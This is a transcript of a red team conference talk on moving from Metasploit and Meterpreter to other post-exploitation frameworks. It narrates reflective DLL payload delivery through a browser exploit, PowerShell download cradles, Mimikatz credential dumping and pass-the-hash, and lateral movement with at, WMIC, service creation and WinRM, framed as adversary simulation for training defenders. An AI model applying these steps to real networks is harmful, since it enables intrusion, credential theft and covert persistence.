Hi, this is Raphael Mudge, the creator of Cobalt Strike. In this video, I'm going to take you through flying a Cylon Raider. This is a Battlestar Galactica-inspired talk on tool-agnostic fundamentals for red team operations. This talk gets its name from an episode in season one of Battlestar Galactica, and that episode is You Can't Go Home Again. In this episode, Lieutenant Kara Thrace finds herself marooned on an asteroid with a non-functional Colonial Viper. Unable to use her spacecraft to get back home, she ventures out and eventually finds a Cylon Raider, which is the enemy spacecraft that crash-landed as well. She finds refuge inside the Cylon Raider, but she's completely unfamiliar with this flying platform. It's the enemy's. So she sits down and thinks to herself, okay, every flying machine has four basic controls: power, pitch, yaw, and roll. And she starts to experiment with the control surfaces to figure out which items control which parts of the spacecraft. And once she figures that out, she applies her knowledge of flight fundamentals to successfully pilot the Cylon Raider back to safety. It's a really cool episode, and I think there's a neat analogy here that applies to red team operations and adversary simulations. Today, Ed Skotus gave a talk from Salmon to Scarlet where he talked about the different ways to effectively use red assets. Many folks think red teaming and they think no holds barred full scope penetration tests. And in my mind, that's actually quite far from the truth. There are many different ways to use red assets. One way that is very, very common is using red teams to exercise and train folks who do intrusion detection and intrusion response. The whole goal is to make blue team better and validate what works and what doesn't, okay? I often talk about adversary simulations, which is a subset of red team operations. And adversary simulations are usually assumed breach. How the red team got there doesn't matter because ideally you're playing the role of a long-term embedded actor. So usually a trusted agent will give the red team their start. There's no need to actually fish. Now, because the goal is to exercise detection response process against a hypothetical long-term embedded actor, the red team usually has to play the role of an external actor, okay? So there's none of this APT in the conference room stuff. You're no kidding, you have internet-based infrastructure, you have to get a payload out of the network and operate through that lifeline and achieve your objectives through your strategic footholds. Now, these engagements usually have a big emphasis on post-exploitation and lateral movement, because that's where the bad guy is going to achieve their objectives. And that's also where you're going to leave things behind and create the noise, intentionally or not, that leads to being caught. Now, what's really interesting about these engagements, oftentimes you don't get to choose the tool set, okay? If you're dealing with a blue team of any level of maturity, the engagement is going to dictate which tool set you can use. And where I really mean this is for folks who are used to the Metasploit framework and Meterpreter. Once you start dealing with mature hunt teams and more mature blue teams, a Meterpreter is nearly going to be completely off the table. So it becomes very important to realize which tools are out there, which options those tools give you for covert communications, and how stealthy is the tool and how well does it support your operational security as a well-resourced hypothetical adversary, okay? And so this concept of how do we take our knowledge of Meterpreter and what the Metasploit framework does and map that to other post-exploitation frameworks is the whole reason for this talk. So now that I've motivated this talk and why I want to go over the concepts in it, let's talk about what I'm actually going to cover. I'm going to start with some concepts behind delivering a post-exploitation payload. We'll talk a little bit about PowerShell post-exploitation, some ideas for privilege escalation, harvesting credentials, lateral movement, and I'll take you through a quick survey of alternative post-exploitation platforms beyond Meterpreter. Now remember, this talk is very much geared towards folks who are comfortable with the Metasploit framework, who primarily know Meterpreter, and my whole goal is to get you thinking about the process you might use in the Metasploit framework, but applying it to other tools. So let's start with delivery. Here's the general process for delivering a payload with the Metasploit framework. The Metasploit framework delivers payloads in stages, okay? So you stand up your client-side attack, target comes to visit you, they download the attack, and with the attack, they also download a small piece of code called a stager. And a stager is very tiny. It's usually a few hundred bytes written in hand-optimized assembly. And the stager has one job and one job only, and that is to connect back to you, the attacker, download the rest of the payload, and inject it into memory, okay? From there, the payload starts communicating with you, and you have your command and control. And if you're used to the Metasploit framework, you see this happen with Meterpreter all the time. But if you're going to use another tool set, you should be asking, is it possible to use the same process to deliver Meterpreter to deliver another post-exploitation agent? And the answer is yes. Yes, it is. The magic behind this is the reflective DLL. Meterpreter is compiled as a reflective DLL, and the stagers in the Metasploit framework are designed to deliver a reflective DLL and inject it into memory. And you may be asking, what is a reflective DLL? Reflective DLL is a DLL with a reflective loader function. In Windows, you can load a DLL into a process using a function called loadLibrary. The limitation of this function is that you must tell it where on disk your DLL is located. And most attackers don't like to touch disk. So this is where the reflective DLL comes in. A guy named Stephen Feuer, who's done some really, really amazing work, he came up with a function that loads a DLL into a process from an arbitrary blob in memory. So this allows you to reference a DLL somewhere in memory and get it into your process, okay? Metasploit framework goes a step further, and here's what it does. When the Metasploit framework delivers a reflective DLL, it patches the beginning of the reflective DLL with some code that basically calls the reflective loader function with a pointer to the beginning of the DLL. So in this way, when the stager passes execution to your payload, what's happening is that little patch says, hey, reflective loader, I want you to run and I want you to load the payload that's you. I want you to load yourself. So in a way, the payload becomes self-bootstrapping. And so that's how payload delivery works with Meterpreter. And if you build your post-exploitation agent as a reflective DLL, you can deliver your post-exploitation agent with Metasploit's attacks as well. Let me show you what that looks like. Okay. So here we are in Kali Linux, okay? And I've pulled the reflective DLL source from GitHub. And I'll show you what this one does. This is the entry point to my reflective DLL, just DLL main. And this DLL just pops up a message box saying, hello from DLL main. Okay, so this is Stephen Feuer's demo reflective DLL. But you could very easily make it kick off your payload, okay? Just build your payload in C. And instead of having a int main entry point, have a DLL main entry point and let your payload operate as normal. Now let me show you the reflective loader function. That's reflective loader.c. And reflective loader All it does takes a parameter, which is the blob memory where your payload resides. And this function goes through doing all the same things that load library would do and loads that DLL into the process, ideally your payload. So what I'm going to do is I'm going to show you for this demo, we're going to take Stephen Feuer's Hello World Reflective DLL, and we're going to deliver it with a Metasploit framework exploit. And the main goal here is to demonstrate to you that it is possible to use the Metasploit framework to deliver an arbitrary reflective DLL. So let's go ahead and kick off an exploit. I'm going to use an older one here. Remember, the goal here is not to show cool Metasploit exploits, but rather to demonstrate the flexibility you gain if your post-exploitation agent of choice or need is built as a reflective DLL. So we're going to do the browser exploit MS11003 IE CSS import. And we're going to do set payload. And we'll do Windows DLL inject. This is the payload variant to stage an arbitrary reflective DLL. And we'll do that over a reverse TCP stager. And we have to set the DLL option to root reflective DLL injection bin reflective DLL.dll. Let's go ahead and properly set our L host. And we'll set our L port for the stager to 4444, very Metasploit. And let's set URI path to slash foo. Let's do a quick show options. And this module is looking configured to me. And let's do an exploit-j. Great. The Metasploit framework is now serving this exploit on port 8080. And the payload it's going to deliver is our Hello World reflective DLL. Now, let's come over to target system. And I'm going to go ahead and run Internet Explorer. Okay. And what we're going to do is navigate over to my Metasploit instance, 172.16.14.158.8080/foo. And what I want you to see is in the Metasploit framework, we get the usual stuff you'd see from Metasploit, and then the whole sending stage piece, right? And here in our Windows target, you can see hello from DLL main, which matches the behavior we would expect to see. Which matches the behavior we would expect to see from the default reflective DLL. Hello from DLL main. Okay, so that's an example of kind of a tool agnostic or post-exploitation payload agnostic way to get a payload on target with an exploit without touching disk. So once you're on target, one of the things folks will often ask is say, okay, I love Meterpreter because of all the features it has. And folks will say, I love Meterpreter because of the post-exploitation modules. What do I do without those things? Well, this is where PowerShell is really, really nice. I've found over the past year, since I really started to embrace PowerShell in my work, that I have everything I need in PowerShell. So I look at PowerShell as my favorite way for post-exploitation automation. And my favorite capabilities are in the PowerShell Empire Projects Power Tools and PowerSploit. And we're going to talk about weaponization in a minute. That is a little bit tricky, a little bit agent specific, but we'll get into it. So what can you get out of PowerShell? Okay, things that you might expect to see in the Metasploit framework. Well, with just PowerShell by itself, in PowerSploit, you get a port scanner that actually runs on target, okay, and reports results back when you get your PowerShell output. You get the ability to take screenshots. You get the things you would expect from incognito, so the ability to impersonate and impersonate and search for tokens. PowerSploit also gives you its own implementation of the group policy preferences attack that can help you elevate. That's pretty nice. And PowerSploit also gives you a way to run Mimikatz without touching disk. And that'll play a lot in this presentation as well. What does PowerUp do? Well, PowerUp, you can think of it as a privilege escalation vulnerability scanner, but instead of looking for missing patches, it looks for misconfigurations. And for dealing with mature environments, I really think PowerUp is should be one of your go-to tools. But you could roughly think of it as having some of the same things you would expect to find in exploit Windows local, where some of the Metasploit framework exploits help you identify and leverage configuration problems. What about PowerView? PowerView is another script from the PowerTools collection in the PowerShell Empire project. And you could think of PowerView as a superset of the post-Windows gather enum AD modules in the Metasploit framework. So PowerView gives you tools to query LDAP, query domain, and discover targets and do target reconnaissance without scanning. So great, a lot of great PowerShell capability. But if you've ever tried to run PowerShell through Meterpreter, you'll probably find it's kind of difficult. Recently, some folks contributed a few modules that make it a little easier to run PowerShell through Meterpreter. But for a lot of reasons, they're not what you would use if you're trying to play the role of a low and slow, quiet actor. So what are the favored weaponization methods? Well, one method to bring PowerShell into an environment is through what's called the PowerShell download cradle. And that's PowerShell execute policy bypass. The command is invoke expression, new object net web client, download string. And you tell PowerShell to download your PowerShell kit from wherever, and then run whatever commandlet you want against that. Now, if you're playing the role of a low and slow embedded actor, it's not necessarily in your favor to reach out of the network to GitHub to pull stuff down. Now, one way I've done PowerShell weaponization is to do that download string download cradle, but to a one-off web server that is bound to localhost serving whatever script I want to use. So that's how I do PowerShell weaponization. And by using the download cradle with a web server built into my payload that listens on localhost only, I'm able to do PowerShell weaponization without making a network connection out of the localhost and without touching disk. So that's pretty nice. Another option, though, is to use unmanaged PowerShell. And unmanaged PowerShell is a technique developed by Lee Christensen from Silent Break Security. And what unmanaged PowerShell is, it's an executable that loads the .NET CLR into the current process, okay? And it reflectively loads a C# class that runs some methods from SystemNet automation that make it possible to run whatever PowerShell you want in the current process. Now, you may be asking, why would you want to do that? Well, with unmanaged PowerShell, you have an executable that you can call whatever you want that basically lets you use PowerShell without creating a PowerShell process. Now, Justin from Varus Group, 6dub, Justin Warner, he built a project called PowerPick. And what he did is ported Lee Christensen's unmanaged PowerShell into a reflective DLL, giving him the ability to inject a PowerShell interpreter into any process he wants, okay? You'll notice that's why I talk about reflective DLLs early on, because all this material keeps coming back. So the main point here is that there are multiple methods for PowerShell weaponization. Each has its strengths and weaknesses. And the post-exploitation payload you use may implement different variations of these techniques. Now, I'd like to share a few notes on PowerShell. I love PowerShell, okay? But going forward, I plan to benefit from PowerShell, but I want to always make sure I'm able to operate without it. Here's why. Windows 10 has made really big strides towards making it possible to defend against offensive PowerShell capability. This includes more robust logging, and it also includes things like the anti-malware scan interface that lets antivirus engines inspect a PowerShell script in its final form before an expression gets evaluated. So a lot of really cool stuff going on at Microsoft. I certainly give them a lot of kudos where I can. If you want my opinion, I really think we probably have about 5 years left of a free pass with PowerShell. And then you can expect to see things like the download cradle readily getting caught by antivirus procs. And it's going to be a little bit harder. Okay, let's talk about privilege escalation. Remember, the core idea of this talk is to take an interpreter user, which may be you, and get you comfortable with embracing other post-exploitation agents so you can operate a little bit quieter, a little bit stealthier, and use the capability you're already familiar with. So the Metasploit framework has quite a collection of privilege escalation exploits, right? I mean, it's one of its great capabilities. Now, one thing that's unique about these privilege escalation exploits and for Metasploit, a lot of Metasploit exploits are written in Ruby, and that makes it harder to bring those into a custom payload written in C. But the privilege escalation exploits are actually often written as reflective DLLs that can deliver a Metasploit framework stager, okay? So if you look at the external source exploits folder in the Metasploit framework GitHub repository, you will notice source code for different Metasploit framework exploits. This is where the source code for those reflective DLLs lives as well. Here's the source code for CVE-2014-4113, which the Metasploit framework has an exploit for. And you'll notice the DLL main entry point for the reflective DLL. And you'll notice just above that, there's a debug statement saying, hey, executing payload, and then Metasploit, or excuse me, this privilege escalation DLL creating a thread to kick off whatever payload the Metasploit user wanted. You can take this same source code and recompile it and tweak that line to make it deliver your payload stager or to kick off your payload however you want to, okay? So just because you're using a payload other than interpreter doesn't mean you have to be denied the privilege escalation capability in the Metasploit framework. Just a little bit of programming knowledge could take you quite far and give you access to this capability as well. I'd also recommend taking a look at Google Project Zero, because oftentimes there are proof of concept privilege escalation exploits there that have not made it to the Metasploit framework. So there's a lot of capability to bring into your personal toolkit there as well. Okay, so presumably we're on target and we've elevated our privileges, okay? And we've done all of our normal post-exploitation spy on the user stuff. You may be asking, how do you harvest credential material without Meterpreter, without Hashdump, without Smart Hashdump, and the other modules in the Metasploit framework? Well, enter Mimikatz. Mimikatz is probably the one post-exploitation tool I cannot live without. And Mimikatz is a lot more than the wdigest command. It's a lot more than just recovering credentials from memory. It is truly a Swiss Army knife for harvesting trust material from Windows, repurposing that trust material, and very, very advanced forms of persistence based on tweaking how Windows interprets and uses trust material. So a few things to be aware of. LSA dump cache. This is a Mimikatz command that is basically equivalent to the Windows gather cache dump post-exploitation module in Metasploit. LSA dump SAM. You can think of this as loosely being equivalent to Windows Gather hash dump, Sekulsa logon passwords. This is actually a Mimikatz meta command that runs several credential harvesting techniques to pull credentials and hashes out of LSAS. Okay. Sekulsa logon passwords is one of my favorites because if plaintext creds are there for the logged on user, you'll get them. But even if those plaintext creds are scrubbed, you may get lucky and actually get the hashes for the domain users that are currently logged onto the system. And that can be pretty valuable. Another one in Mimikatz that's pretty new is LSA dump DC sync. And what this command does is it uses Windows APIs for replication between domain controllers to actually pull an NTLM hash of a specific user from your domain controller. So you can use DC sync to safely pull the curb TGT hash from a domain controller, use that to forge a golden ticket and have domain admin forever. Now, of course, you do need a domain admin trust to do DC sync, but it's a pretty neat capability. So let's go ahead and demo using Mimikatz to harvest credential material. And let me just pull up my target for this case. So here we're going to use another Windows 7 system. And because I'm trying to be tool agnostic in this talk, I'm going to do everything from this target's desktop. So I'm going to go ahead and kick off Mimikatz. Remember, we're running in an elevated context, okay? So let's go ahead and just do privilege debug. And this is a lot like getprivs in Meterpreter. And it gives you the SE debug privilege, so you can do some things. And let's do Sekulsa logon passwords. Okay. And what I want you to see is we're able to harvest the credential material for different users on the system. For example, my user, what a hog. And there's her NTLM hash as well. And of course, here I've got the domain administrator account logged on. And of course, the plaintext creds, or if we're on a newer Windows version like Windows 10, the plaintext piece might not be there, but the NTLM hash probably will be if the user's logged on. So this is just using Sekulsa logon passwords from Mimikatz. Now, let's go ahead and continue our story. Let's talk about lateral movement. Now, a lot of folks, they love the Metasploit framework for the modules. And if you ask somebody, what's your favorite exploit, they'll probably say, oh, PSExec. So I want to, in this next section of this presentation, dispel the notion that you have to use PSExec or SMBExec from Kali to do lateral movement in a Windows network. The built-in tools will do just fine. So what is the process for lateral movement? Well, step one, enumerate the network, look for targets. Step two, look at the trust material that you have on hand. That could be hashes, it could be credentials, it could be tokens that you have the option to impersonate, and leverage one of those trust relationships to get another system on the network to believe that you're a local or domain administrator. And leverage that trust relationship to then interrogate the system, pull files, or even execute your payload on that target. And we're going to go through each of these steps again in a tool agnostic way. So network enumeration, how do you do it? Well, rather than scan the network, which is a pretty noisy thing to do, not really in favor of it, you can just rely on what's built into Windows, okay? So this is the usual suspect of built-in Windows commands for target enumeration. And what I'm going to do real quick is just do a demo and show you some of those commands in action. So I'm going to just pop open a command shell. And let's go ahead and do netview whack domain to just get an idea of what my default domain is. I can see glitter. If I do netview whack domain glitter, I get a list of hosts that have shares I might be able to access. And this is dependent on what's called the Windows Browser Service, something that predates Active Directory. It could potentially be turned off. Be aware of that. But this will give you a list of some hosts you might be able to interact with. Okay. Some other favorites. To do netgroup, domain computers, WAC domain. Domain computers is a group that the computer accounts for systems joined to the domain are in. And if you query that group, you can actually get a pretty quick list of the NetBIOS names of different systems you might be able to target. You don't need to scan anything. So that's an example of target discovery without scanning and without Metasploit Framework post modules. Now, once you discover targets, you really want to know which systems you can interact with as an administrator, okay? Because if you're an administrator, that means you have rights to do things. You can interact with shares that only administrators can access. You can schedule processes, run processes in different ways. Do pay attention to trust relationships for local users, okay? So if you have a trust relationship for a local admin on another system, that can be just as good for getting you your next hop. You don't have to expect to go to domain admin right away. That's not even realistic in most situations. Oftentimes you kind of spread out until you capture that final trust you need and take the whole domain. Now, one thing you're going to want to do is check if you might be an admin with whatever access token you currently have. And the ways I like to do it is using the dir command. I usually do a dir on admin dollar or C dollar on a target, or using at to get a list of jobs. And if getting access denied with either of these commands, it might be that the share or the Windows task schedule service are disabled, or you're not a local admin. So let me show you what that looks like, just kind of using those things. If I want to find out the DC, let's just do an NL test DC list glitter. And I can see that the domain controller here is glitter. So let's go ahead and try to do a dir on C dollar on the DC. And you can see I get an access denied. And if I do an at on the DC, access is denied. So this current shell does not have a trust relationship of any sort with the domain controller as an admin. Okay, you'll notice I mentioned the access token a moment ago. I'd like to go with a little bit more depth on access tokens. So every process in Windows has an access token. And an access token is a data structure managed by LSAS, which is the security broker process for Windows. And the access token says things like who you are, which groups you're in, which privileges you have on the current system. And more importantly, for our purposes, the access token also references your credential material for single sign-on purposes. So the user in the access token does not matter when you interact with a remote system. It's really that single sign-on information that is what Windows is going to use to negotiate and authenticate with a system on the same network, okay? So by manipulating access tokens, you have the ability to manipulate how Windows presents you to another system. And we're gonna take advantage of that for setting up different kinds of trust relationships for lateral movement. So let's talk about credentials. How do you create a trust with a system if you have credentials for a local admin or domain admin? One option is to do the old school net use backwack backwack target, C dollar or admin dollar, and just do WAC user, domain user, password. And once you create this trust, you now have a session with that system, and other commands in the past will have just passed that session's credential material for you. Now, I have run into situations as Windows has gotten more aggressive about scrubbing credentials out of memory. I've seen many situations where NetUse used in this way has not actually passed my credential material with all the commands, I'd like to see it pass my credentials with. And that makes me sad. So there are alternatives. One option is to take advantage of run as. Okay? So you can use run as to create a token or to spawn a process as another user and have an access token on the current system for that user. Just do run as, whack user, the domain, and the user, whatever process you want to run. Now, that's great if you're operating from a system joined to the domain. What if you need to create a token on a system that's just going to pass the credentials you specify? Maybe they're the credentials for the SID500 account, the local administrator, if that's enabled. Well, you can use the net only flag with run as. So just do run as, whack user, domain user, whack net only, and then whatever program you want to run. And I'd like to thank Justin Warner from Varus Group for making me aware of that one. Now, one thing about run as, those of you who've tried this, probably wondering about something, probably wondering, hey, Raph, run as is cool, but if I try to use run as through a rat, there is no way to pass the password on the command line to run as. And that's a limitation and one I've seen many times. So what I'm going to point out, some post-exploitation payloads will give you the ability to elevate with credentials using the same Windows APIs that run as uses, okay? But if you're stuck, pull out your trusty Red Team Field Manual and jump over to page 31. And there, Ben Clark lists a VB script hack to run as and pass credentials to it. Okay, so it is possible to run as through a post-exploitation payload and pass credentials to it if you're willing to get a little bit creative. This one-liner in particular is very ugly because it's multiple levels of quoting to run a PowerShell download cradle to inject a payload into memory. So if you unravel that a little bit, just make it run an arbitrary command, it does get a little bit simpler. Now, what about pass the hash? You may be asking, how do I do pass the hash in this brave new world? Because oftentimes, folks will use PSExec and Metasploit, tunneled through Meterpreter, so they can do things like pass the hash. Well, you don't need Metasploit, and you don't need Metasploit's PSExec module to do pass the hash. You can do it with Mimikatz. Use Sakrulsa PTH to kick off a process with a copy of your access token modified to pass whichever domain, user, and NTLM hash you specify. So Sakrulsa PTH will let you do pass the hash in Windows. Let me show you what that looks like. Here's my trusty Mimikatz, okay? Let's do Sakrulsa, pass the hash, whack user, administrator, whack domain, glitter, whack NTLM, colon. And let's go ahead and scroll up to the administrator account. Let's pretend we can't actually see those plaintext creds. And let's go ahead and grab the NTLM hash for the administrator account. Okay, paste. And let's go ahead and make this run PowerShell. Okay, I now have a new PowerShell window. If I do a who am I want you to see that I am the user what a hog, okay? But if I try to do a dir over the domain controller, I get a listing back on $. This is because Windows is going to use the information in my access token to authenticate to the domain controller and negotiate a trust with it so it can access that share. And the information in my access token happens to be the information put there by Mimikatz, which is the user administrator, the domain glitter, and the NTLM hash we provided. So this is how you pass the hash with a post-exploitation agent that lets you run Mimikatz. Now, you may be saying, great, Raph, I can set up trust relationships, whoop-de-doo. And great, Raph, I can list the directory listing on CDollar. Yay. You might be asking, how do I run malware on a target? Well, there are a lot of ways to do it. You can copy your malware artifact over to target system, over to CDollar or AdminDollar. And you can use many different options built into Windows to kick off your payload. For example, you can use the task scheduler service to kick off your process at a certain time. Just do net time, whack whack target to get the time on the host, and just do at whack whack target, a time in the future, and the path to where your malware lives, and Windows will run your malware at the specified time. You can also use WMIC to run something as well. Just do WMIC, whack node, your target, process call create, and the path to your payload. That's it. You can also create a service through the service control manager. Just do SC, whack whack the target, create name, bin path equals, space, the path to your malware, start that service, and now your malware is running as system. By the way, this is the exact same thing PSExec does in the background. So these are different options for code execution. And what's really cool is that Windows will negotiate with the target system based on whatever is in your access token or even your Kerberos tray, if you set the flags correctly in some of these commands, to authenticate that system. So really, lateral movement in Windows comes all down to the access token and creating access tokens that have the material you need. Now, executing code on target is cool, but sometimes I really like to interact with critical servers without malware. It's much more safe and friendly to your OPSEC as an attacker. One way you can do that is with WinRM. WinRM is the Windows Remote Management Service. It's built into Windows. Caveat, it is off by default, okay? Some organizations turn it on critical servers to make it easier to manage them with PowerShell. And WinRM runs on port 5985. With WinRM, you can use the invoke command commandlet built into Windows to run whatever PowerShell script block you want on whatever system has WinRM up. Now, you do need an admin trust, okay? You do need an admin trust with the system as a domain user for WinRM to work. So let's go ahead and demo that real quick. Here we are in the Granite system. And previously, we did pass the hash to interact with the domain controller. Well, can you use pass the hash with WinRM? Yes, you can. Let's go ahead and do invoke command dash computer name DC script block. And let's do a dir on CDollar. And you'll notice I get back same information. So with WinRM, I'm able to run whatever command I want. And in this case, because I used Mimikatz to create an access token that was doctored up to pass my hash, I am actually passing the hash with WinRM. And this is an example of the flexibility you get when you decouple trust material from lateral movement post-exploitation capability. You can mix and match the different methods for creating an access token with the different things you might want to do to interact with and pull information from a target, okay? So pretty neat stuff. One thing I'll show you too, if we do a who am I over WinRM, you can see glitter slash administrator. So that's just showing you that the DC thinks I am the domain admin user because that's whose hash I passed. Now, I've taken you through a lot of information on tool agnostic ways to do the same things in a network you might do with the Metasploit framework and with Meterpreter. Now, because you're watching this video, I assume you're familiar with my work, and I'd prefer to take the focus off the things I do and talk about some of the other post-exploitation platforms out there. But do buy my stuff. I'm cool with that. Trust me. But I just want to keep this kind of on other things as well, just to kind of, I don't know, broaden your horizons or make it more of an honest talk. So let's talk about innuendo. Innuendo is a post-exploitation payload and framework from Immunity, the same folks who made Canvas. And Innuendo is a Python interpreter and post-exploitation framework built as a reflective DLL. Now, what's kind of cool about Innuendo is you can build your post-exploitation automation in Python and just use it pretty simply. And you can also build covert channels in Python. And I do a lot of C programming, and trust me, it would be really nice to build a lot of stuff in Python. So they're doing something good there. And Innuendo supports a lot of channels right now. It supports ICMP. It can actually communicate over email. They have a DNS channel, name pipes, and of course, HTTP and HTTPS as well. And also, much in the spirit of this talk and different ways to use Red assets, Immunity markets Innuendo as a capability to help validate and ensure your investment in your intrusion detection capability. And I give Immunity a lot of props. The reason I give them a lot of props is because they have a 10-year plus investment in Canvas, a penetration testing tool set and exploit framework, okay? But with Innuendo, they're fully acknowledging that this kind of red team work is not the realm of penetration testing tools. It requires something a bit different. And this is something I've been saying for a few years now. So kudos to Immunity for looking forward. It's something I think very few organizations have the guts to do. And that's why you're in this presentation. Here's what Innuendo's web interface looks like. It's pretty slick. You can find several demos of Innuendo on Vimeo. Let's talk about PowerShell Empire. PowerShell Empire is built by several folks who work for the Varis Group. I have a lot of friends there. And Empire is the brainchild of Will Schroeder, Justin Warner, and Will Schroeder's son, Matt Nelson. And I'm just joking. Every time I bring up Will, Justin, and Matt, I have to troll them. It's kind of a rule now. So there's your troll, guys. So PowerShell Empire is pretty cool. It's a PowerShell post-exploitation agent, okay? And there have been many arguments claiming that PowerShell is a toy language not suitable for real malware. Well, PowerShell is nice because it's built into Windows, but it has been true in the past. You couldn't just arbitrarily inject PowerShell into whatever process you want. But Lee Christensen's payload for unmanaged PowerShell really changed this. And Will and Justin recognized this. And once they built PowerPick, which was the reflective DLL version of Lee Christensen's unmanaged PowerShell capability, they set to work to build a complete post-exploitation agent in PowerShell with the same capability to inject into arbitrary processes that you would enjoy with Meterpreter or payloads written in clean C code. Right now, PowerShell Empire supports HTTP and HTTPS as a data channel. If you watch Will and Justin's different talks, you will notice that they talk about other channels to come. So I recommend you keep an eye on this project. And you can learn more about Empire at PowerShellEmpire.com. And here's a screenshot of what PowerShell Empire looks like. For those of you familiar with the tools I built, you'll find that some similar abstractions, some similar thought process, and PowerShell Empire is very, very much in line with the content of this talk as well. New on the post-exploitation scene is a payload called Puppy, and I'm not very familiar with him or her, but it's developed by somebody from France called NinjaSec, or they call themselves NinjaSec. And Puppy is a Python post-exploitation framework, Sound familiar? Built as a reflective DLL. So it's Python interpreter, post-exploitation capability, compiled into a reflective DLL. And I apologize if I get this wrong, but I believe that Puppy right now has a TCP channel, and the TCP channel has the capability to mold itself to look like different protocols. This is different from, say, a WinHTTP or WinINET channel in another payload, and that might inherit proxy information from the user's access token. So that's what Puppy can do for you right now. It is open source. You can learn a bit about it by checking it out on GitHub. And here's a screenshot of Puppy in action using a memory exec command to run Mimikatz without touching disk. So right there, you can see that Puppy gives you some of the base capability needed to apply the operating tradecraft discussed in this talk. Another one I would like you to check out is Throwback and Slingshot. Throwback and Slingshot are custom tools made by a company called Silent Break Security, okay? Throwback is actually open source. There's a private version too that's a little bit stealthier. And Throwback is an asynchronous agent meant solely for persistence because adversaries with good OPSEC will actually use different tools for different parts of their engagement. So you might have one tool set for persistence and another one for operating. So if the operating tool set gets caught, the persistence tool set is not actually burned. So Throwback is an agent for asynchronous, low and slow persistence. Slingshot is Silent Break's alternative to Meterpreter. It's an interactive agent for post-exploitation. It does PowerShell weaponization. It can run Mimikatz without touching disk, and it has several other post-exploitation convenience items. Slingshot is very, very much in line with the operating tradecraft discussed in this presentation. Now you may be asking, how do you get these tools? Because the private version of Throwback and Slingshot are not publicly available. Well, you can get them, and you can get them by taking the Dark Side Operations class offered by Silent Break Security. Go ahead and Google Dark Side Operations. The class bridges the gap between red team tradecraft and development and takes you through how to build reflective DLLs, how to port capability to reflective DLLs, and how to get started modifying your post-exploitation agents and making them your own. I took the course in December 2014. It's one of the best courses I've ever taken. I wrote a review of it as well. You can find that on Google if you Google Dark Side Operations. And I highly, highly recommend the course. If you like the material in this talk, if you like these concepts, but you're unfamiliar with reflective DLLs, you're not comfortable with tweaking settings in Visual Studio, take Dark Side Operations. It will take you through this process. Fantastic course. I can't recommend it enough. And to boot, you get a private tool set to start operating with as well. So it's quite a bargain. Here's a screenshot of Throwback. And here's a screenshot of Slingshot. So fantastic stuff. Of course, you can opt to build your own capability. If you want just kind of some sense of operating tradecraft and how to do that in PowerShell, I really recommend taking a look at No Tools, No Problem, Building a PowerShell Botnet by Chris Campbell. And this one was given at ShmootCon Fire Talks, February 2013. And there Chris goes through both his operating tradecraft and how to build different kinds of post-exploitation capability in PowerShell. And Empire is really the marriage between this talk and Lee Christensen's unmanaged PowerShell capability. So let's kind of revisit the core concept of this talk, and that is, what is power, pitch, yaw, and role in red team operations? What are the things you need to be able to do through a post-exploitation payload to operate in this way? Well, if your favorite payload is packaged as a reflective DLL, You suddenly have a whole world of options to inject it into processes and to deliver it with exploits and other capability, because there is a whole ecosystem of tools compatible with the Metasploit framework. For example, the Veil Evasion framework to generate executables. So reflective DLLs give you a lot for free. And Rafi's opinion, if an agent for Windows is not built as a reflective DLL, I don't even consider it, unless it's built with some other memory injection capability. But the Pi to EXE stuff is not operationally ready, is not an operationally ready payload, in my opinion. So a reflective DLL or something else that's memory injectable is table stakes. You need a covert channel, okay? The whole differentiator between payloads going forward is going to be the automation and even ability to do some of these things without running commands, and to do these things in a stealthy way through different Windows APIs, and the ability to do that through different covert channels. You're going to need the ability to execute commands and upload files, but in some very modern, very mature kinds of defensive postures, you're going to find that executing commands will get you caught. So be aware of that. I'm giving you tool agnostic fundamentals, but good payloads will actually give you equivalent functionality built on Windows APIs. PowerShell gives you a lot. If you can use PowerShell through a payload, most of your automation is there. And Mimikatz gives you an incredible amount of capability for manipulating and harvesting trust as well. So in summary, the purpose of this presentation is to take those of you who are primarily used to Meterpreter and help you bring some of the concepts you understand, some of your process, and some of what you know over to the other new post-exploitation frameworks and platforms that are starting to emerge. So I talked about delivery, how if a post-exploitation platform is built as a reflective DLL, you can use your knowledge for getting a payload on target to get that platform on target. I talked about PowerShell for post-exploitation and how some of the things like PowerUp, PowerTools, and PowerView gives you some of the things that you're used to in the Metasploit framework. I talked about privilege escalation and how you can pretty quickly, if you're comfortable with reflective DLLs, bring Metasploit's different privilege escalation capabilities over to your favorite tool set. Talked about how to harvest credential material. We talked about lateral movement. You really don't need Metasploit modules to do it. There's quite a bit built into Windows. And the things I talked about really just scratched the surface. And I also took you through a quick survey of different post-exploitation platforms other than mine that are well suited to this kind of operating tradecraft. I hope you enjoyed this presentation on how to operate with different post-exploitation platforms. Good luck and happy hacking.